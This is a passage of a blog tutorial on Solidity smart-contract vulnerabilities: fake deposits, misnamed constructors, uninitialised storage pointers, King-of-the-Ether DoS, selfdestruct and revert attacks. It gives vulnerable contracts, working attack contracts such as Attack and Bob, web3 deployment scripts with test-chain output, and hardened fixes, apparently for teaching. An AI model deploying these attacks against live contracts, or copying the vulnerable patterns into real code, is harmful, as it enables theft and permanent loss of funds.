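        return selector == bytes4(keccak256(abi.encodePacked("ping()")));
    }

    function () public {
        require(msg.data.length >= 4, "no selector");
        require(allowed(msg.sig), "selector not allowed");
        require(address(delegate).delegatecall(msg.data), "delegatecall failed");
        // Relaying the callee's return data needs assembly in 0.4.x; omitted here,
        // the point is only that allowed calls still go through.
    }

    // The privileged action the attack was really after: now owner-gated.
    function transferOwnership(address newOwner) public {
        require(msg.sender == owner, "owner only");
        owner = newOwner;
    }
}
```

If the delegate must be allowed to write storage, the other half of the fix is matching storage layouts: every variable the delegated code touches has to sit at the same slot in the caller, which is why owner is deliberately declared first in both contracts here.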

Fake deposit vulnerability

The transfer() below answers an impossible transfer (an amount larger than the sender's balance) with return false instead of reverting. The transaction is therefore mined as successful, and a deposit-crediting service that only checks the transaction status, without inspecting the return value or a Transfer event, credits a deposit that never moved any tokens. That is the fake-deposit pattern; the fix is a require() so that failure reverts the transaction.

pragma solidity ^0.4.22;

contract token1{
    address owner;
    uint public amount = 0;
    mapping (address => uint256) balances;
    function token1() payable {}
    function() payable {}
    function deposit1() payable { balances[msg.sender] += msg.value; }
    function deposit2() payable { balances[this] += msg.value; }
    // Vulnerable: an impossible transfer returns false instead of reverting,
    // so the transaction itself still succeeds.
    function transfer(address _to, uint256 _value) public returns (bool) {
        if(_value <= balances[msg.sender] && _value > 0){
            balances[msg.sender] -= _value;
            balances[_to] += _value;
            return true;
        }
        else
            return false;
    }
}

var token1Contract = web3.eth.contract([{"constant":false,"inputs":[],"name":"deposit2","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"type":"function","stateMutability":"nonpayable"},{"constant":true,"inputs":[],"name":"amount","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":false,"inputs":[],"name":"deposit1","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"payable":true,"type":"fallback","stateMutability":"payable"}]);
var token1 = token1Contract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xab11788d6ba4f6473557fbb9eddfa3f5bbe7effe transactionHash: 0x98831308fe0c78991154368bcf70cf203b4a45a9321b3e87d6dc9e1d04bf5b20
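The block below is an added example, not code from the original post, that plays the fake-deposit pattern end to end on-chain. Both tokens implement the same ERC-20 subset; the only difference is that FakeDepositToken signals failure with return false while StrictToken reverts. The Vault shows the two ways a depositor can be credited: creditUnchecked() trusts that the transaction did not revert, which is how fake deposits were credited in practice, and creditChecked() insists on the boolean and on the balance delta. Contract names and amounts are assumptions for illustration.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post). Scenario: an account with ZERO
// FakeDepositToken balance calls token.approve(vault, 100) and then
// vault.creditUnchecked(token, 100); it ends up with credited == 100 although
// no tokens moved. creditChecked() reverts in the same situation, and
// StrictToken reverts on either path.
contract BaseToken {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;
    event Transfer(address indexed from, address indexed to, uint256 value);

    constructor(uint256 supply) public { balanceOf[msg.sender] = supply; }

    function approve(address spender, uint256 value) public returns (bool) {
        allowance[msg.sender][spender] = value;
        return true;
    }

    function transferFrom(address from, address to, uint256 value) public returns (bool);
}

contract FakeDepositToken is BaseToken {
    constructor(uint256 supply) public BaseToken(supply) {}

    // Vulnerable: an impossible transfer just returns false; the tx still succeeds.
    function transferFrom(address from, address to, uint256 value) public returns (bool) {
        if (value == 0 || balanceOf[from] < value || allowance[from][msg.sender] < value) {
            return false;
        }
        balanceOf[from] -= value;
        allowance[from][msg.sender] -= value;
        balanceOf[to] += value;
        emit Transfer(from, to, value);
        return true;
    }
}

contract StrictToken is BaseToken {
    constructor(uint256 supply) public BaseToken(supply) {}

    // Hardened: failure reverts the whole transaction, nothing downstream can misread it.
    function transferFrom(address from, address to, uint256 value) public returns (bool) {
        require(value > 0, "zero value");
        require(balanceOf[from] >= value, "insufficient balance");
        require(allowance[from][msg.sender] >= value, "insufficient allowance");
        balanceOf[from] -= value;
        allowance[from][msg.sender] -= value;
        balanceOf[to] += value;
        emit Transfer(from, to, value);
        return true;
    }
}

contract Vault {
    // token => depositor => amount credited
    mapping(address => mapping(address => uint256)) public credited;

    // Unsafe: mirrors a service that only asks "did the transaction succeed?".
    function creditUnchecked(BaseToken token, uint256 amount) public {
        token.transferFrom(msg.sender, address(this), amount);   // bool ignored
        credited[address(token)][msg.sender] += amount;
    }

    // Safe: require the return value, and cross-check with the balance delta so a
    // token that returns true without moving funds is caught as well.
    function creditChecked(BaseToken token, uint256 amount) public {
        uint256 before = token.balanceOf(address(this));
        require(token.transferFrom(msg.sender, address(this), amount), "transferFrom returned false");
        require(token.balanceOf(address(this)) - before == amount, "balance delta mismatch");
        credited[address(token)][msg.sender] += amount;
    }
}
```

The balance-delta check in creditChecked() is the one that also survives tokens with fees or rebasing logic; the return-value check alone is the minimum any integration should do.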

Rubixi vulnerability (misnamed constructor)

The contract was renamed from DynamicPyramid to rubixi, but the constructor kept the old name. In Solidity 0.4.x the constructor is simply the function whose name matches the contract, so DynamicPyramid() is now an ordinary public function that anyone can call to become creator: rubixi.DynamicPyramid.sendTransaction({from: eth.accounts[1]}) followed by rubixi.creator() shows the takeover (creator is left public here so it can be read from the console). Solidity 0.4.22 and later provide the constructor keyword precisely to rule this mistake out.

pragma solidity ^0.4.22;

contract rubixi{
    uint private balance = 0;
    uint private collectedFees = 0;
    uint private feePercent = 10;
    uint private pyramidMultiplier = 300;
    uint private payoutOrder = 0;
    //address private creator;
    address public creator;
    
    // meant to be the constructor, but the contract is no longer called DynamicPyramid,
    // so this is a plain public function anyone can call
    function DynamicPyramid(){
        creator = msg.sender;
    }
    function getCreator() public  returns (address){
        return creator;
    }
}
var rubixiContract =  web3.eth.contract([{"constant":true,"inputs":[],"name":"creator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"getCreator","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"DynamicPyramid","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]);
var rubixi = rubixiContract.new({
     data: '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', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0xef9bd8324a06275cf4ad1721bf1e3e3bbd2ea13f transactionHash: 0xc55c83651f34e706052663a8550a22e998235c224a611c525d8f5ea16ec238e2

CryptoRoulette attack

The trap is the uninitialised storage pointer in play(): Game game; without the memory keyword aliases storage slot 0, so game.player = msg.sender overwrites secretNumber with the caller's address and game.number = number overwrites lastPlayed, all before the comparison is made. A guess in 1..10 can therefore never match, and reading the "private" secretNumber beforehand with eth.getStorageAt(address, 0) does not help either. With shuffle() pinned to 1 as below, play(1) with 0.1 ether still does not pay out.

// https://github.com/misterch0c/Solidlity-Vulnerable/blob/master/traps/CryptoRoulette.sol
// https://etherscan.io/address/0x94602b0E2512DdAd62a935763BF1277c973B2758

pragma solidity ^0.4.19;

// CryptoRoulette
//
// Guess the number secretly stored in the blockchain and win the whole contract balance!
// A new number is randomly chosen after each try.
//
// To play, call the play() method with the guessed number (1-20).  Bet price: 0.1 ether

contract CryptoRoulette { 

    uint256 private secretNumber;   // slot 0
    uint256 public lastPlayed;      // slot 1
    uint256 public betPrice = 0.1 ether;
    address public ownerAddr;

    struct Game {
        address player;
        uint256 number;
    }
    Game[] public gamesPlayed;

    function CryptoRoulette() public {
        ownerAddr = msg.sender;
        shuffle();
    }

    function shuffle() internal {
        // randomly set secretNumber with a value between 1 and 20
        //secretNumber = uint8(sha3(now, block.blockhash(block.number-1))) % 20 + 1;
        // pinned to 1 here to make the experiment easier to verify; no real shuffle
        secretNumber = 1;
    }

    function play(uint256 number) payable public {
        require(msg.value >= betPrice && number <= 10);

        Game game;                  // uninitialised storage pointer: aliases slot 0
        game.player = msg.sender;   // overwrites secretNumber
        game.number = number;       // overwrites lastPlayed
        gamesPlayed.push(game);

        if (number == secretNumber) {   // secretNumber is now uint256(msg.sender)
            // win!
            msg.sender.transfer(this.balance);
        }

        shuffle();
        lastPlayed = now;
    }

    function kill() public {
        if (msg.sender == ownerAddr && now > lastPlayed + 1 days) {
            selfdestruct(msg.sender);   // the original uses the deprecated alias suicide()
        }
    }

    function() public payable { }
}
var cryptorouletteContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"uint256"}],"name":"gamesPlayed","outputs":[{"name":"player","type":"address"},{"name":"number","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"kill","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"number","type":"uint256"}],"name":"play","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[],"name":"ownerAddr","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"lastPlayed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"betPrice","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var cryptoroulette = cryptorouletteContract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x7d0721e53dba437ece0f8611696573cf17b75179 transactionHash: 0xbc852383090eb0a78e82a4d6ec0eebe69f7f2d2930f88bc48746880d38b1bb5f
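The block below is an added example, not code from the original post, that isolates the storage-pointer aliasing behind CryptoRoulette and shows the fix. Two public uint256 variables stand in for secretNumber and lastPlayed so the clobbering can be observed through getters from the console; the vulnerable and fixed recorders are otherwise identical. The contract name and seed values are assumptions for illustration.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post). After recordVulnerable(3) from
// account A: secret() == uint256(A), second() == 3. After recordFixed(3):
// secret and second are untouched and only games[] grows.
contract SlotAliasing {
    uint256 public secret = 7;   // slot 0: plays the role of secretNumber
    uint256 public second = 8;   // slot 1: plays the role of lastPlayed

    struct Game { address player; uint256 number; }
    Game[] public games;         // slot 2

    // Vulnerable: `Game g;` without `memory` is a storage pointer that defaults
    // to slot 0, so the two field writes land in `secret` and `second`, and the
    // pushed Game is a copy of those clobbered slots.
    function recordVulnerable(uint256 n) public {
        Game g;                   // uninitialised storage pointer -> slot 0
        g.player = msg.sender;    // SSTORE slot 0
        g.number = n;             // SSTORE slot 1
        games.push(g);
    }

    // Fixed: build the struct in memory so only games[] changes.
    function recordFixed(uint256 n) public {
        Game memory g = Game(msg.sender, n);
        games.push(g);
    }

    // The same comparison CryptoRoulette.play() makes after the writes: it can
    // only succeed when n equals the caller's address reinterpreted as a number.
    function wouldWin(uint256 n) public view returns (bool) {
        return n == secret;
    }

    function gameCount() public view returns (uint256) {
        return games.length;
    }
}
```

Solidity 0.4.x only warns about the uninitialised pointer; from 0.5.0 it is a compile error, which is the real fix for code that can be upgraded.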

King of the Ether Throne attack (DoS)

becomePresident() pays the previous president with transfer() inside the same call. Once the Attack contract, whose fallback always reverts, has become president, that transfer reverts for every subsequent caller, so nobody can ever become president again and the contract is stuck for good. This is the failure mode of pushing payments to arbitrary addresses; the remedy is a pull (withdrawal) pattern.

pragma solidity ^0.4.10;

contract PresidentOfCountry {
    address public president;
    uint256 public price;

    function PresidentOfCountry(uint256 _price) {
        require(_price > 0);
        price = _price;
        president = msg.sender;
    }

    function becomePresident() payable {
        require(msg.value >= price); // must pay the price to become president
        president.transfer(price);   // we pay the previous president (reverts if it refuses ether)
        president = msg.sender;      // we crown the new president
        price = price * 2;           // we double the price to become president
    }

}

contract Attack { 
    function () { revert(); }        // refuses every payment, so president.transfer() to this contract always fails

    function Attack(address _target) payable {
        // become president from the constructor; the ether sent at deployment is forwarded as the bid
        _target.call.value(msg.value)(bytes4(keccak256("becomePresident()")));
    }
 }

The first contract, PresidentOfCountry:

var _price = 10 ;
var presidentofcountryContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"becomePresident","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":true,"inputs":[],"name":"president","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":true,"inputs":[],"name":"price","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_price","type":"uint256"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var presidentofcountry = presidentofcountryContract.new( _price,
{
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '10000000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x025b689415e02b896d6cc021ad56ff38e8ae0a93 transactionHash: 0x3109ad838eb20a89f8513f3f411f8872022a8d4d6f2560eff8ad1b0a96e380dc

The second contract, Attack:

To pass msg.value at deployment (i.e. send ether to the contract while creating it), add value: xxx at the spot shown (line 10 of the WEB3DEPLOY snippet, after the gas option); if value is the last option, no trailing comma. value is in wei: 40 wei here, against the price of 10 wei set above.

var _target = "0x025b689415e02b896d6cc021ad56ff38e8ae0a93";
var attackContract = web3.eth.contract([{"inputs":[{"name":"_target","type":"address"}],"payable":true,"type":"constructor","stateMutability":"payable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var attack = attackContract.new(_target,
  {
    data: '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',
    from: web3.eth.accounts[1],
    gas: '4700000',
    value: 40
  }, function (e, contract) {
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
      console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
  })

Contract mined! address: 0x64a8df8e846d40335b9f3072e4e187568646f879 transactionHash: 0x7effac1203afb6a5b2dd500f3ee8398a9b24611d0dc6f3843da7784040e2831f
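The Attack contract works because becomePresident() pushes ether to the old president inside the same call. The following contract is an added example, not code from the original post: the same game rewritten with the withdrawal (pull-payment) pattern. The contract name PresidentOfCountrySafe and the mapping pendingWithdrawals are my own names; the constructor and the price-doubling rule are assumed to match the original PresidentOfCountry.

```solidity
pragma solidity ^0.4.22;

// Added example (not from the original post): the president game rewritten
// with the withdrawal (pull-payment) pattern. The previous president is only
// credited here; he collects his payout himself in withdraw(), so a president
// whose fallback reverts can only block his own payout, not the game.
contract PresidentOfCountrySafe {
    address public president;
    uint256 public price;
    mapping(address => uint256) public pendingWithdrawals;

    constructor(uint256 _price) public {
        president = msg.sender;
        price = _price;
    }

    function becomePresident() public payable {
        require(msg.value >= price);              // must pay at least the current price
        pendingWithdrawals[president] += price;   // credit the old president, no external call
        president = msg.sender;                   // crown the new president
        price = price * 2;                        // double the price, as in the original game
    }

    // Each former president pulls his own payout. If his fallback reverts,
    // only this call fails; becomePresident() keeps working for everyone else.
    function withdraw() public {
        uint256 amount = pendingWithdrawals[msg.sender];
        require(amount > 0);
        pendingWithdrawals[msg.sender] = 0;       // zero the balance before sending (checks-effects-interactions)
        msg.sender.transfer(amount);
    }
}
```

With this layout a reverting fallback such as the one in Attack simply leaves that address's credit unclaimed in pendingWithdrawals; the rest of the players are unaffected.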

call-after-destruct attack

pragma solidity ^0.4.24;

contract selfdestructGame {
    address owner;

    // Funded at deployment (value is passed in the deployment options below)
    constructor() public payable {
        owner = msg.sender;
    }

    function ownedEth() public view returns (uint256) {
        return this.balance;
    }

    function deposit() public payable {}

    // Anyone may destroy the contract and send its whole balance to _who.
    // Afterwards the address has no code, but calls and transfers to it
    // still succeed, so any later deposit() is silently lost.
    function destruct(address _who) public {
        selfdestruct(_who);
    }
}
var selfdestructgameContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"_who","type":"address"}],"name":"destruct","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"ownedEth","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]);
var selfdestructgame = selfdestructgameContract.new({
    data: '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',
    from: web3.eth.accounts[0],
    gas: '4700000',
    value: 1000000000000000000
  }, function (e, contract) {
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
      console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
  })

Contract mined! address: 0x4973329ea175750eb8eb3ce89c6fb4935370e502 transactionHash: 0x4e2df136792bb470ed450355e64d2f4dbf0eb13d03140fd124f415505178672d
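The defensive counterpart of this attack is to refuse to send ether to an address that has no code any more. The contract below is an added example, not code from the original post; the interface GameLike, the contract name GuardedDepositor and the function names hasCode/safeDeposit are my own, and GameLike only assumes the deposit() function that selfdestructGame above really has.

```solidity
pragma solidity ^0.4.24;

// Minimal view of selfdestructGame used by the caller below.
interface GameLike {
    function deposit() external payable;
}

// Added example (not from the original post): a caller that refuses to send
// ether to an address that currently has no code. After selfdestruct() the
// game's address is an ordinary empty account, and a plain call or transfer
// to it succeeds without error, so the deposited ether would simply be lost.
contract GuardedDepositor {
    function hasCode(address _a) internal view returns (bool) {
        uint256 size;
        assembly { size := extcodesize(_a) }   // 0 for EOAs, destructed and not-yet-deployed contracts
        return size > 0;
    }

    function safeDeposit(address _game) public payable {
        require(hasCode(_game), "target has no code (destructed?)");
        GameLike(_game).deposit.value(msg.value)();
    }
}
```

The same check from the geth console is `eth.getCode(selfdestructgame.address)`, which returns "0x" once destruct() has been mined. Note that extcodesize is also 0 while a contract's constructor is still running, so this guards against the destructed case only; it is not a general "is the caller a contract" test.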

Revert (rollback) attack

pragma solidity ^0.4.19;

contract Alice {
    // Stand-in "random number": always 11, so the winning guesses are 9..13
    function random() internal returns (uint8) {
        return 11;
    }
    // Payable fallback: a call with an unknown selector just keeps the ether
    function() payable {}
    function guess(uint8 num) payable public returns (bool) {
        require(msg.value >= 1 ether);

        uint8 rand = random();
        if (num > rand-3 && num < rand+3) {
            // Prize is paid in the same transaction, so the caller knows the
            // outcome before its own transaction ends (this is what Bob exploits)
            msg.sender.transfer(2 ether);
        }
        else {
            return false;
        }
        // a winning guess falls through and returns the default value false
    }
}

contract Bob {
    // Payable fallback so Bob can be funded with the 1 ether stake and can
    // receive the 2 ether prize (without it Alice's transfer() to Bob reverts)
    function () public payable {}

    function rollback(Alice alice, uint8 num) public {
        uint256 balance1 = this.balance;
        // The selector must match Alice's guess(uint8); a wrong signature lands
        // in Alice's payable fallback and the stake is simply kept by Alice.
        // Note: a value-carrying CALL costs 9000 gas by itself, so 10000 is a
        // very tight budget for a winning guess.
        bool isSucceed = address(alice).call.gas(10000).value(1 ether)(bytes4(keccak256("guess(uint8)")), num);
        uint256 balance2 = this.balance;

        // No prize received: revert, so the 1 ether stake is not spent either
        if (balance2 < balance1) {
            revert();
        }
    }
}

First contract, Alice:

var aliceContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"num","type":"uint8"}],"name":"guess","outputs":[{"name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var alice = aliceContract.new({
    data: '0x6060604052341561000f57600080fd5b6101518061001e6000396000f300606060405260043610610041576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680634ba4c16b14610043575b005b61005c600480803560ff16906020019091905050610076565b604051808215151515815260200191505060405180910390f35b600080670de0b6b3a7640000341015151561009057600080fd5b61009861011c565b90506003810360ff168360ff161180156100ba57506003810160ff168360ff16105b1561010c573373ffffffffffffffffffffffffffffffffffffffff166108fc671bc16d674ec800009081150290604051600060405180830381858888f19350505050151561010757600080fd5b610115565b60009150610116565b5b50919050565b6000600b9050905600a165627a7a72305820e39fa2e1da7684bbe7afc299d2ac9995bcf4d0f408c328a106387893ff5f22240029',
    from: web3.eth.accounts[0],
    gas: '4700000'
  }, function (e, contract) {
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
      console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
  })

Second contract, Bob:

var bobContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"alice","type":"address"},{"name":"num","type":"uint8"}],"name":"rollback","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var bob = bobContract.new({
    data: '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',
    from: web3.eth.accounts[0],
    gas: '4700000'
  }, function (e, contract) {
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
      console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
  })
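Bob's trick only works because Alice decides and pays out the game inside the caller's own transaction. The contract below is an added example, not code from the original post: the guess is recorded in one transaction and settled in a later one, so the outcome is unknown while the caller can still revert. The contract name AliceSettledLater, the Bet struct and settle() are my own names; the "within plus or minus 2 of the number" rule and the 1 ether stake / 2 ether prize are taken from Alice above.

```solidity
pragma solidity ^0.4.24;

// Added example (not from the original post): a guessing game that cannot be
// gamed by Bob's revert-on-loss trick. guess() only records the bet; the
// outcome is decided in settle(), in a later transaction, from a block hash
// that did not exist when guess() was mined. Reverting settle() on a loss
// no longer recovers the ether paid in guess().
contract AliceSettledLater {
    struct Bet {
        uint8 num;
        uint256 blockNumber;
        bool open;
    }
    mapping(address => Bet) public bets;

    function () public payable {}

    function guess(uint8 num) public payable {
        require(msg.value >= 1 ether);
        require(!bets[msg.sender].open);          // one open bet per player
        bets[msg.sender] = Bet(num, block.number, true);
    }

    function settle() public {
        Bet storage b = bets[msg.sender];
        require(b.open && block.number > b.blockNumber);
        b.open = false;                           // close the bet before paying out
        // blockhash() only covers the last 256 blocks; beyond that it returns 0,
        // so a bet must be settled in time.
        uint256 rand = uint256(blockhash(b.blockNumber)) % 16;
        uint256 n = b.num;
        // same "within +/-2" rule as the original, written without underflow
        if (n + 3 > rand && n < rand + 3) {
            msg.sender.transfer(2 ether);
        }
    }
}
```

The point of the example is the split between committing and settling, not the randomness source: a block hash can be influenced by the block producer, so a real game would use a commit-reveal scheme or an oracle for rand. What the split buys is that a contract caller no longer learns the result inside the transaction that pays the stake.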

Shadow variable attack

pragma solidity 0.4.26;

contract Shadow {
    bool public unlocked = false;   // slot0

    struct Record {
        bytes32 name;
        address addr;
    }

    mapping(address => Record) public registRecord; // slot1
    event Log(address addr, bool msg);

    function regist(bytes32 _name, address _addr) public {
        // Uninitialized storage pointer: it points at slot 0 of the contract,
        // so the struct's fields overlay the contract's own state variables
        Record newRecord;
        newRecord.name = _name; // slot0: overwrites unlocked (any non-zero _name reads as true)
        newRecord.addr = _addr; // slot1: overwrites the mapping's base slot

        emit Log(msg.sender, unlocked);
    }
}
var shadowContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"registRecord","outputs":[{"name":"name","type":"bytes32"},{"name":"addr","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"unlocked","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"bytes32"},{"name":"_addr","type":"address"}],"name":"regist","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":false,"name":"addr","type":"address"},{"indexed":false,"name":"msg","type":"bool"}],"name":"Log","type":"event"}]);
var shadow = shadowContract.new({
    data: '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',
    from: web3.eth.accounts[0],
    gas: '4700000'
  }, function (e, contract) {
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
      console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
  })
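The fix is to never leave a struct variable as an uninitialized storage pointer. The contract below is an added example, not code from the original post: it keeps Shadow's layout and names (unlocked, Record, registRecord, regist, Log) and only changes where newRecord lives; the contract name ShadowFixed is my own.

```solidity
pragma solidity 0.4.26;

// Added example (not from the original post): the Shadow contract with the
// uninitialized storage pointer removed. In the original, "Record newRecord;"
// is a storage pointer that defaults to slot 0, so newRecord.name overwrites
// unlocked (slot 0) and newRecord.addr overwrites the mapping's slot (slot 1).
contract ShadowFixed {
    bool public unlocked = false;                       // slot 0, untouched by regist()

    struct Record {
        bytes32 name;
        address addr;
    }

    mapping(address => Record) public registRecord;     // slot 1
    event Log(address addr, bool msg);

    function regist(bytes32 _name, address _addr) public {
        // Build the record in memory and copy it into the mapping entry.
        Record memory newRecord = Record(_name, _addr);
        registRecord[_addr] = newRecord;

        // Equivalent form with an explicit storage pointer to the mapping slot:
        // Record storage r = registRecord[_addr]; r.name = _name; r.addr = _addr;

        emit Log(msg.sender, unlocked);                 // still false
    }
}
```

To see the original corruption from the geth console, call `shadow.regist.sendTransaction(...)` with a non-zero name and then read `eth.getStorageAt(shadow.address, 0)`: slot 0 holds the bytes of `_name` instead of the boolean, and `shadow.unlocked.call()` reports true. Against ShadowFixed the same calls leave slot 0 at zero.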
Copyright notice: this is the blogger's original article, released under the CC 4.0 BY-SA license; reproductions must include a link to the original source and this notice.
Original link: https://blog.csdn.net/qq_42417179/article/details/126878948
